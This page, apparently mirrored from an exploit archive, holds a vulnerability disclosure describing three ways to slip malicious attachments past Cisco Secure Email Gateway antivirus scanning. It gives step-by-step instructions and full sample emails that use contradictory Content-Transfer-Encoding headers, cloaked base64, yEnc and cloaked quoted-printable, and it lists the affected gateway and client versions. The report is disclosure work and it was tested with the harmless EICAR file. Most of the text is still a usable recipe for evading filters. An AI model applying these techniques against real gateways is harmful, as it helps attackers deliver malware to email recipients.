Exploit for Cisco Secure Email Gateway Malware Detection Evasion

Name: Exploit for Cisco Secure Email Gateway Malware Detection Evasion
Rating: 5 (173 reviews)
2022-11-15 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:169860
This report is being published within a coordinated disclosure  
procedure. The researcher has been in contact with the vendor  
but not received a satisfactory response within a given time  
frame. As the attack complexity is low and exploits have already  
been published by a third party there must be no further delay  
in making the threads publicly known.  
  
The researcher prefers not to take credit for their findings.  
  
  
Evading Malware Detection by Cisco Secure Email Gateways  
========================================================  
  
Cisco Secure Email Gateways, formerly known as Cisco Ironport  
Email Security Appliances, that are configured to detect  
malicious email attachments, can easily be circumvented.  
A remote attacker can leverage error tolerance and different  
MIME decoding capabilities of email clients, compared with the  
gateway, to evade detection of malicious payloads by anti-virus  
components on the gateway.  
  
Method 1: Cloaked Base 64  
-------------------------  
  
Step-by-step instruction:  
  
1. Prepare an email with the malicious attachment with a  
commonplace email client or employing standard MIME encoding,  
using content-transfer-encoding base64.  
  
2. Insert CR+LF line breaks at random places in the base64  
encoded block so that the lines have different lengths,  
but in a way that groups of four base64 characters (encoding  
three bytes) stay together. This is intended to evade naïve  
heuristics to detect base64 even out of context, while not  
violating the MIME standard.  
  
3. Before the content-transfer-encoding header of the attachment,  
insert another contradictory header "Content-Transfer-Encoding:  
quoted-printable". This does violate the MIME standard.  
  
4. Remove any content-length headers of the message, if present.  
  
A complete email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: quoted-printable  
Content-Transfer-Encoding: base64  
  
UEsD  
BAoAAAAAAN2Q  
21Q8z1FoRAAAAEQAAAAJABwAZWlj  
YXIuY29tVVQJAAOh  
[... more similar lines skipped ...]  
CwAB  
BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A  
AACHAAAAAAA=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Emails prepared in this fashion will pass through affected  
gateways with a verdict of being clean from malware, even if  
the attachment is otherwise easily recognizable malware such as  
the Eicar test virus. Many popular email clients, on the other  
hand, will present the attached file and faithfully reproduce  
it upon saving.  
  
Affected systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. Affected Email Clients were  
Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build  
16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),  
Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.  
  
Method 2: yEnc Encoding  
-----------------------  
  
yEncode or short yEnc is an encoding typically employed by  
usenet clients. Some email clients are capable of decoding MIME  
parts with this encoding, too. A remote attacker using this  
encoding for a malicious email attachment will evade malware  
detection by affected gateways but may succeed in delivering  
the payload to victims if they use particular email clients.  
Other email clients will store the attachment in an undecoded  
and thus not directly harmful form.  
  
An email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: x-yencode  
  
=ybegin line=128 size=236 name=file.bin  
[... binary content skipped ...]  
=yend size=236  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Affected Systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. An affected Email Client  
was Mozilla Thunderbird 91.11.0 (64-bit).  
  
Method 3: Cloaked Quoted-Printable  
----------------------------------  
  
This method is similar to method 1 with the roles of  
quoted-printable and base64 swapped. The payload has to  
be encoded quoted-printable, but with each byte rather than  
just non-printable bytes encoded and on separate lines with  
continuation. The contradicting headers now come in the order  
base64, quoted-printable.  
  
An email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: base64  
Content-Transfer-Encoding: quoted-printable  
  
=50=  
=4B=  
=03=  
=04=  
[... more similar lines skipped ...]  
=00=  
=00=  
=00=  
=00=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Affected Systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. Affected Email Clients  
were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.  
  
References  
----------  
  
Code employing the methods presented here and many similar  
techniques to manipulate MIME encoding can be found on GitHub:  
https://github.com/noxxi/mime-is-broken  
  
Cisco has published an advisory with a workaround  
facilitating an undocumented feature of the gateway that  
can be used to block incorrect MIME. This mitigates  
many cases of the test suite from GitHub, but not all,  
particularly not the ones presented in this report. URL:  
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679  
  
End of the report.